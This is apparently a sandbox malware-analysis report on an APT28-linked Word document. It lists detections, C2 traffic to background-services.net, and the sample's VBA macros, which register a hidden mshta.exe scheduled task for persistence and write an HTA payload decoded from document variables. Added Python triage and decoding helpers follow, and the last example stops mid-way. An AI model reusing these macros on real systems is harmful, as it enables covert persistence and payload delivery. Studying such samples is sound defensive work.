
Windows Analysis Report
Rev5_ Joint Declaration C5 GER_track changes.doc

Overview

General Information

Sample name: Rev5_ Joint Declaration C5 GER_track changes.doc
Analysis ID: 1590268
MD5: a15e652cf058209c0c0040dfcaf86fec
SHA1: 0f162082585615212dd8a3fce41944a9a04c5a21
SHA256: 47092548660d5200ea368aacbfe03435c88b6674b0975bb87a124736052bd7c3
Tags: doc, UAC-0063, user-smica83

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Document contains an embedded VBA macro which accesses itself as a binary file (likely for evasion)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Machine Learning detection for dropped file
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Document contains embedded VBA macros
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Yara signature match

Classification

  • System is w11x64_office
  • WINWORD.EXE (PID: 7992 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • WINWORD.EXE (PID: 2392 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • mshta.exe (PID: 1460 cmdline: "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Settings\locale MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
  • cleanup
No configs have been found
Yara matches (Source / Rule / Description / Author / Strings):

Source: settings.xml
Rule: apt_susp_apt28_uac0063_malicious_doc_settings_xml
Description: Detects some suspected APT28 document settings.xml
Author: Sekoia.io
Strings:
  • 0x36c1:$: Call svc.GetFolder(
  • 0x3201:$: CreateTextFile(appdir

Source: C:\Users\user\AppData\Local\Settings\locale
Rule: apt_susp_apt28_uac0063_hta_loader
Description: Detects some suspected APT28 HTA loader
Author: Sekoia.io
Strings:
  • 0x0:$: <HEAD><HTA:APPLICATION ID
  • 0xec:$: script Language="VBScript.Encode

Source: 00000009.00000002.2963111692.00000230803F0000.00000004.00000800.00020000.00000000.sdmp
Rule: apt_susp_apt28_uac0063_hta_loader
Description: Detects some suspected APT28 HTA loader
Author: Sekoia.io
Strings:
  • 0x0:$: <HEAD><HTA:APPLICATION ID
  • 0xec:$: script Language="VBScript.Encode

Source: Process Memory Space: mshta.exe PID: 1460
Rule: apt_susp_apt28_uac0063_hta_loader
Description: Detects some suspected APT28 HTA loader
Author: Sekoia.io
Strings:
  • 0x6c51:$: <HEAD><HTA:APPLICATION ID
  • 0x6d3d:$: script Language="VBScript.Encode
No Sigma rule has matched
Suricata IDS alert:
Timestamp: 2025-01-13T21:33:51.571617+0100
SID: 2057742
Severity: 1
Classtype: A Network Trojan was detected
Source IP: 2.58.15.158
Source Port: 80
Destination IP: 192.168.2.26
Destination Port: 59240
Protocol: TCP

AV Detection

Source: Rev5_ Joint Declaration C5 GER_track changes.doc | Avira: detected
Source: Rev5_ Joint Declaration C5 GER_track changes.doc | ReversingLabs: Detection: 34%
Source: Rev5_ Joint Declaration C5 GER_track changes.doc | Virustotal: Detection: 42%
Source: C:\Users\user\Desktop\~WRD0000.tmp | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\~WRD0001.tmp | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59244 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59246 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59249 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59251 version: TLS 1.2
Source: global traffic | DNS query: name: 171.39.242.20.in-addr.arpa
Source: global traffic | DNS query: name: background-services.net
Source: global traffic | TCP traffic: 192.168.2.26:49676 -> 52.182.143.209:443
Source: global traffic | TCP traffic: 192.168.2.26:49675 -> 2.16.158.35:443
Source: global traffic | TCP traffic: 192.168.2.26:49677 -> 204.79.197.203:443
Source: global traffic | TCP traffic: 192.168.2.26:49691 -> 2.23.242.162:443
Source: global traffic | TCP traffic: 192.168.2.26:49692 -> 2.16.168.103:443
Source: global traffic | TCP traffic: 192.168.2.26:49687 -> 2.16.158.35:443
Source: global traffic | TCP traffic: 192.168.2.26:49672 -> 20.198.118.190:443
Source: global traffic | TCP traffic: 192.168.2.26:59244 -> 40.115.3.253:443
Source: global traffic | TCP traffic: 192.168.2.26:59246 -> 40.115.3.253:443
Source: global traffic | TCP traffic: 192.168.2.26:59249 -> 40.115.3.253:443
Source: global traffic | TCP traffic: 192.168.2.26:59251 -> 40.115.3.253:443
Source: global traffic | TCP traffic: 192.168.2.26:59224 -> 162.159.36.2:53
Source: global traffic | TCP traffic: 162.159.36.2:53 -> 192.168.2.26:59224
Source: global traffic | TCP traffic: 192.168.2.26:59240 -> 2.58.15.158:80
Source: global traffic | TCP traffic: 2.58.15.158:80 -> 192.168.2.26:59240
Source: global traffic | TCP traffic: 192.168.2.26:59242 -> 2.58.15.158:80
Source: global traffic | TCP traffic: 2.58.15.158:80 -> 192.168.2.26:59242
Source: global traffic | TCP traffic: 2.23.242.162:443 -> 192.168.2.26:49691
Source: global traffic | TCP traffic: 2.16.168.103:443 -> 192.168.2.26:49692
Source: global traffic | TCP traffic: 192.168.2.26:59243 -> 2.58.15.158:80
Source: global traffic | TCP traffic: 2.16.158.35:443 -> 192.168.2.26:49687
Source: global traffic | TCP traffic: 2.58.15.158:80 -> 192.168.2.26:59243
Source: global traffic | TCP traffic: 20.198.118.190:443 -> 192.168.2.26:49672
Source: global traffic | TCP traffic: 40.115.3.253:443 -> 192.168.2.26:59244
Source: global traffic | TCP traffic: 40.115.3.253:443 -> 192.168.2.26:59246
Source: global traffic | TCP traffic: 192.168.2.26:59248 -> 2.58.15.158:80
Source: global traffic | TCP traffic: 2.58.15.158:80 -> 192.168.2.26:59248
Source: global traffic | TCP traffic: 40.115.3.253:443 -> 192.168.2.26:59249
Source: global traffic | TCP traffic: 40.115.3.253:443 -> 192.168.2.26:59251
Source: global traffic | TCP traffic: 192.168.2.26:59253 -> 2.58.15.158:80
Source: global traffic | TCP traffic: 2.58.15.158:80 -> 192.168.2.26:59253

Networking

Source: Network traffic | Suricata IDS: 2057742 - Severity 1 - ET MALWARE TA426/Zebrocy Hatvibe CnC Server Response M1 : 2.58.15.158:80 -> 192.168.2.26:59240
Source: global traffic | TCP traffic: 192.168.2.26:59224 -> 162.159.36.2:53
Source: Joe Sandbox View | ASN Name: HIGHWINDS2US HIGHWINDS2US
Source: Joe Sandbox View | JA3 fingerprint: 6a5d235ee78c6aede6a61448b4e9ff1e
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.209
Source: unknown | TCP traffic detected without corresponding DNS query: 2.16.158.35
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.242.162
Source: unknown | TCP traffic detected without corresponding DNS query: 2.16.168.103
Source: unknown | TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown | TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Date: Mon, 13 Jan 2025 20:33:51 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 945
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 56 0b 6e e3 3a 0c bc 92 44 52 94 75 9c c4 9f 3d c0 de 1f 78 33 94 a5 38 69 ba 68 83 57 a3 81 ad 0f 39 1c 7e ff 6e 65 db 0e dd f5 f8 63 7f 8e ed af 1d be 4b b2 52 a5 8a 1f 55 24 15 f1 52 b5 16 df bc 60 67 c7 d7 52 2d 6d e9 e6 e6 87 9f 3b be 57 93 dd 2b 76 cd 8a af 3e 57 ab 9a d4 56 cc b3 57 dc ce 21 67 11 81 cc 84 af 5d 44 9a 2c 9a f0 bb 7b 73 93 a4 9b 24 11 57 48 37 c8 10 48 83 1e bf 03 0c b4 9a 43 e3 0e bd 86 d3 81 d6 17 85 b4 52 8a 99 6b 56 97 c5 17 69 3c 9b da 6f ec 49 d0 ee 19 72 b3 11 3f ac c1 fb d2 f1 f4 95 27 c9 de e5 e1 14 25 97 9a 0c 92 c1 40 a3 46 de d1 0c 6d e0 08 67 de ca 2d b4 01 f7 70 f2 d4 9f 5a 0d 74 fd fe f9 7e 87 76 f5 a5 0a 8c 58 4c 21 03 12 c8 a0 b8 f3 f7 6e 5b f0 46 6c eb 5b 34 2b 5c d0 f8 9c c8 9f 6d 7e 65 ef a2 3b f8 26 62 78 e5 95 f7 f7 be a8 aa 02 ac c0 e7 b9 eb 83 2f d3 6f bc 10 e7 29 0f 28 fc 21 61 b0 dd 5e b9 9d 9e c9 c3 3e 9e 9f 38 ba 35 f3 8b 6c 42 77 03 33 d0 47 16 35 f1 01 8f 49 60 bb 2d 44 02 9e 73 55 d7 60 7c b0 9b c1 6e 03 97 b9 73 29 2b fd 76 b1 f1 62 c3 bf 38 03 03 d8 8b 95 b0 bd 5b a3 27 8e 38 61 97 1d b9 ee 14 32 26 b4 87 d1 44 39 f8 65 76 40 f7 47 f1 8e 37 3c a9 1c 90 21 7e 93 dd 0e 64 25 f9 04 23 25 31 2a c0 cc ca 78 80 46 66 37 82 0e cc 98 dc 6b 45 4e ae 78 5f 21 f9 ce 33 f0 51 8e 95 f2 9d 74 ee 55 0b 44 19 88 88 cb c8 38 ee 31 13 e8 03 31 e6 fd ce cc 88 9a b2 41 42 23 a6 8e 03 41 9f 6b c2 37 7c 01 fd 79 46 de e1 b7 1a 37 7b 95 f8 54 7b 29 71 4a 64 b3 4c 7b 03 43 67 00 1c 86 ef a2 82 fd 4b 47 f7 3d 2a 1c 2a 56 fc 45 64 91 b5 ce 60 30 09 06 fb a6 de e6 29 c4 26 2c d2 ba 84 65 67 b4 9e bb eb f5 54 f8 88 9a 42 5a ac 3d cb ba 3f a3 ed 08 fa 56 dd 06 43 d6 9c ab 8f 08 ff 6a 4d 8f 9d 14 1e 81 be 62 3d 7a 22 0b f0 af 45 1a a2 14 b5
5a 0b 62 94 ff b0 30 fe c7 9a 68 8b 0a cf 6c 25 d7 fb ac 74 c1 2d 34 af b6 a0 f6 6c b6 f6 88 7f 53 f7 77 20 dd 19 e3 55 c6 d9 29 05 3e 7c ac ce de 31 e3 5f 19 8f 8a 77 c4 10 99 42 b5 c8 51 81 e9 75 e2 dc 0a 4c 2f 4f 67 42 bb 53 86 b2 3b d1 77 5c d9 ea c7 5c a1 aa ae 8f 0e f2 e3 9b 4d b6 ce 31 1e a4 bd 32 06 bc f7 02 74 4c 03 e4 58 bf 5a a8 33 fe 53 fb 19 93 a3 42 5e 79 3c e3 63 54 31 c4 c9 ff 1d 31 2c ae 88 4c 60 51 56 3b 54 10 55 30 8c a0 81 5f f4 9b 88 81 d4 d1 1b 69 47 09 cc bf 43 c1 24 39 1f 19 fd 22 24 e7 47 af 8f 0a c1 0a 93 99 63 94 ff 65 be f8 38 0a 4e 1b b6 f8 ea 5d 44 26 9e b5 56 dc d9 65 1f 55 68 ce 4b 13 29 3b c7 99 27 1f 60 38 b5 df d1 b7 3e 8c c7 8b 84 07 7b 51 57 81 c8 7d e4 30 7b c4 81 68 63 5c 96 e0 76 4a 41 97 68 9c 0f 65 99 ac 47 4f 1d d2 7e d0 e9 2d b0 5c e7 a7 19 f3 60 88 28 f6 5a 23 23 2c 7a de 99 31 91 3d cb ec f4 83 3f 4a eb 9d 5d 1e 33 d2 eb 94 34 e4 b2 e7 91 81 d9 6f cf 1c f1 99 23 35 66 2e ce c6 80 30 7a ce d9 ed 63 32 eb bd e1 4d 07 ef 7d 86 91 cd c9 e4 65 4e b8 95 f8 46 65 ef d3 41 eb
Source: global traffic; DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic; DNS traffic detected: DNS query: background-services.net
Source: mshta.exe, 00000009.00000003.1745355594.000002308190B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1745355594.0000023081901000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2965303369.00000230D8B89000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.php
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.php.Foundation.Diagnostics.AsyncCausalityTracertPr
Source: mshta.exe, 00000009.00000002.2964616847.0000023083205000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.php2P
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpB
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpP.y
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpTime
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpWh
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpet0
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpiP
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpj.s
Source: mshta.exe, 00000009.00000002.2964616847.0000023083205000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phplate
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpn
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpndows
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpvices.net/local.php
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C80000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpvices.net/local.phpder
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.phpvices.net/local.phpf.O
Source: mshta.exe, 00000009.00000002.2965006340.0000023083CAD000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/local.php~
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/setup.php
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/setup.php?i
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/setup.phpIi
Source: mshta.exe, 00000009.00000002.2964230274.0000023083188000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.net/setup.phpOh
Source: mshta.exe, 00000009.00000003.1745355594.0000023081901000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.netE02
Source: mshta.exe, 00000009.00000002.2964085366.0000023081CD0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://background-services.netttings
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://df.loki.delve.office.com
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://dod.loki.office365.us
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://gcc.loki.delve.office.com
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://gcchigh.loki.office365.us
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://github.com/react-native-community/react-native-async-storage/issues
Source: mshta.exe, 00000009.00000002.2965006340.0000023083C7A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.comMicrosoft
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://loki.delve.office.com
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://loki.delve.office.de
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://loki.office365.cn
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://loki.officenet.eaglex.ic.gov
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://loki.officenet.microsoft.scloud
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://msit.loki.delve.office.com
Source: prep_soft Office_root_Office16_sdxs_FA000000027_comments_win32_bundle_V8_perf.cache.0.dr; String found in binary or memory: https://react-native-community.github.io/async-storage/docs/advanced/jest
Source: unknown; Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown; Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown; Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 59246 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 59249 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 59244 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 59249
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 59246
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 59244
Source: unknown; Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 59251
Source: unknown; Network traffic detected: HTTP traffic on port 59251 -> 443
Source: unknown; HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59244 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59246 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59249 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.26:59251 version: TLS 1.2

System Summary

Source: settings.xml, type: SAMPLE; Matched rule: Detects some suspected APT28 document settings.xml Author: Sekoia.io
Source: 00000009.00000002.2963111692.00000230803F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: Process Memory Space: mshta.exe PID: 1460, type: MEMORYSTR; Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Settings\locale, type: DROPPED; Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: Rev5_ Joint Declaration C5 GER_track changes.doc; OLE, VBA macro line: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") (the split literals reassemble to %localappdata%\Temp; splitting them defeats naive keyword matching on the macro source)
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String environ: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp"); Name: documeNt_opEn
Source: ~WRD0001.tmp.7.dr; OLE, VBA macro line (reported three times in the original listing; shown once, reflowed from the colon-joined one-liner):
    Sub baads()
        On Error Resume Next
        ' Task Scheduler 2.0 COM API: no schtasks.exe child process is spawned
        Set svc = CreateObject("Schedule.Service")
        Call svc.Connect
        Set td = svc.NewTask(0)
        Set sets = td.settings
        sets.Enabled = True
        sets.Hidden = True                     ' not shown in the Task Scheduler UI by default
        Set tr = td.triggers.Create(1)         ' 1 = TASK_TRIGGER_TIME
        ' StartBoundary = current local time, formatted as yyyy-mm-ddThh:mm:ss
        tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2)
        tr.Enabled = True
        tr.Repetition.Interval = "PT4M"        ' re-run every four minutes
        Set act = td.Actions.Create(0)         ' 0 = TASK_ACTION_EXEC
        act.Path = "C:\Windows\System32\mshta.exe"
        act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings\locale"
        ' 6 = TASK_CREATE_OR_UPDATE, logon type 3 = TASK_LOGON_INTERACTIVE_TOKEN; registered as "\Settings\ServiceDispatch"
        Call svc.GetFolder("\").RegisterTaskDefinition("Settings\ServiceDispatch", td, 6, , , 3)
    End Sub
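The task that baads() registers leaves a definition on disk (under C:\Windows\System32\Tasks\, also exportable with `schtasks /query /xml`). The following is an added triage helper written for this page, not code from the report, the sandbox or the sample: it parses Task Scheduler XML and flags the traits that routine produces (mshta.exe as the action, an extensionless target under the user's profile, a hidden task, a four-minute repetition). The two XML definitions are constructed to mirror baads() and a benign updater; the list of script hosts and the "short interval" threshold are analyst choices, not values the report states.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}   # assumption: hosts worth flagging as task actions
BEACON_MAX_SECONDS = 15 * 60                                 # assumption: anything this frequent is beaconing-like
_ISO_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_duration_seconds(value: str) -> Optional[int]:
    """Parse the ISO 8601 duration subset Task Scheduler uses (PT4M, PT1H, P1D)."""
    m = _ISO_DURATION.match(value.strip())
    if not m or not any(m.groups()):
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def parse_task(xml_text: str) -> Dict[str, object]:
    """Extract the triage-relevant fields from one task definition.
    Files under System32\\Tasks are UTF-16; read them with encoding="utf-16" first."""
    root = ET.fromstring(xml_text)

    def text(node, path: str) -> str:
        el = node.find(path, NS) if node is not None else None
        return (el.text or "").strip() if el is not None else ""

    triggers = root.find("t:Triggers", NS)
    return {
        "command": text(root, "t:Actions/t:Exec/t:Command"),
        "arguments": text(root, "t:Actions/t:Exec/t:Arguments"),
        "hidden": text(root, "t:Settings/t:Hidden").lower() == "true",
        "interval": text(triggers, ".//t:Repetition/t:Interval"),
    }


def triage_task(task: Dict[str, object]) -> List[str]:
    """Return why a task resembles the baads() persistence; an empty list means nothing notable."""
    reasons: List[str] = []
    command = str(task["command"]).strip('"').lower()
    arguments = str(task["arguments"]).strip('"').lower()
    exe = command.replace("/", "\\").rsplit("\\", 1)[-1]
    if exe in SCRIPT_HOSTS:
        reasons.append(f"action runs script host {exe}")
        if exe == "mshta.exe" and not arguments.endswith((".hta", ".htm", ".html")):
            reasons.append("mshta.exe target has no HTA/HTML extension (disguised script file)")
    haystack = command + " " + arguments
    if any(p in haystack for p in ("\\appdata\\", "%appdata%", "%localappdata%", "\\temp\\")):
        reasons.append("action references a user-writable profile path")
    if task["hidden"]:
        reasons.append("task is hidden from the Task Scheduler UI")
    seconds = iso_duration_seconds(str(task["interval"])) if task["interval"] else None
    if seconds is not None and seconds <= BEACON_MAX_SECONDS:
        reasons.append(f"repeats every {seconds}s, a beaconing-style interval")
    return reasons


# Constructed sample: what baads() registers (TimeTrigger, PT4M, hidden, mshta.exe on an extensionless file).
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT4M</Interval></Repetition>
      <StartBoundary>2025-01-14T10:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Enabled>true</Enabled><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\mshta.exe</Command>
      <Arguments>C:\Users\user\AppData\Local\Settings\locale</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed sample: a benign daily updater for comparison.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <Repetition><Interval>P1D</Interval></Repetition>
      <StartBoundary>2025-01-14T03:00:00</StartBoundary>
    </CalendarTrigger>
  </Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\Vendor\updater.exe</Command><Arguments>/check</Arguments></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for label, xml_text in (("baads() task", SUSPICIOUS_TASK_XML), ("benign task", BENIGN_TASK_XML)):
        findings = triage_task(parse_task(xml_text))
        print(f"{label}: {'; '.join(findings) or 'nothing notable'}")
```

Run it over every file below C:\Windows\System32\Tasks\ (reading each as UTF-16) to surface tasks with the same shape regardless of the task name; the name "Settings\ServiceDispatch" and the file name "locale" are trivially changed between campaigns, the COM-registered hidden task firing mshta.exe every few minutes is not.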
Source: ~WRD0001.tmp.7.dr; OLE, VBA macro line (reported three times in the original listing; shown once, reflowed from the colon-joined one-liner):
    Sub goods()
        On Error Resume Next
        Set fso = CreateObject("Scripting.FileSystemObject")
        appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Settings"
        fso.CreateFolder (appdir)
        Set OutPutFile = fso.CreateTextFile(appdir & "\locale", True)   ' the HTA that mshta.exe later runs
        ' Every document variable except the last three holds payload as hex text;
        ' each two-character pair becomes one byte via Chr("&H" & pair)
        For j = 1 To Documents(1).Variables.Count - 3
            vars = Documents(1).Variables(j)
            For i = 1 To Len(vars)
                OutPutFile.Write Chr("&H" & Mid(vars, i, 2))
                i = i + 1                                                ' two characters per pass
            Next
        Next
        OutPutFile.Close
    End Sub
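Because goods() rebuilds the HTA from hex text stored in the document's variables, the same file can be reconstructed offline without letting the macro run. The following is an added example written for this page, not code from the report, the sandbox or the sample: a Python re-implementation of the decoding loop, including its two quirks (a non-hex pair is silently skipped because the macro runs under On Error Resume Next, and a trailing single character is still evaluated as a one-digit hex value because that is what Mid() returns). The variable values are constructed here; in a real case feed it the values of the document's variables in collection order.

```python
from typing import List


def decode_hex_variable(value: str) -> bytes:
    """Decode one document variable the way goods() does.

    The macro's For loop also increments its counter inside the body, so it
    consumes two characters per pass and emits Chr("&H" & pair).  Under
    On Error Resume Next a non-hex pair raises nothing and produces no byte;
    an odd trailing character is evaluated as a one-digit hex value.  Both
    quirks are mirrored here.  (The macro writes through an ANSI text stream,
    so bytes above 0x7F would pass through the local code page; an ASCII HTA
    is unaffected and we emit raw bytes.)
    """
    out = bytearray()
    for i in range(0, len(value), 2):
        pair = value[i:i + 2]
        try:
            out.append(int(pair, 16))
        except ValueError:
            continue  # On Error Resume Next: the bad pair is simply skipped
    return bytes(out)


def reconstruct_payload(variables: List[str]) -> bytes:
    """Mirror goods(): concatenate the decoded values of every document
    variable except the last three.  The macro's own count excludes those
    three; two of them (block1ergegdr, block2ergegdr) are the VBA source that
    docUment_oPen() injects with AddFromString, not payload bytes.
    `variables` must be in the document's collection order."""
    return b"".join(decode_hex_variable(v) for v in variables[:-3])


def looks_like_hta(payload: bytes) -> bool:
    """Cheap sanity check on the rebuilt file: mshta.exe treats it as HTML
    with an embedded script block, so a <script ...> tag should be present."""
    return b"<script" in payload.lower()


# Constructed sample: the payload split across two variables (the macro accepts
# either hex case), followed by three trailing variables carrying VBA source.
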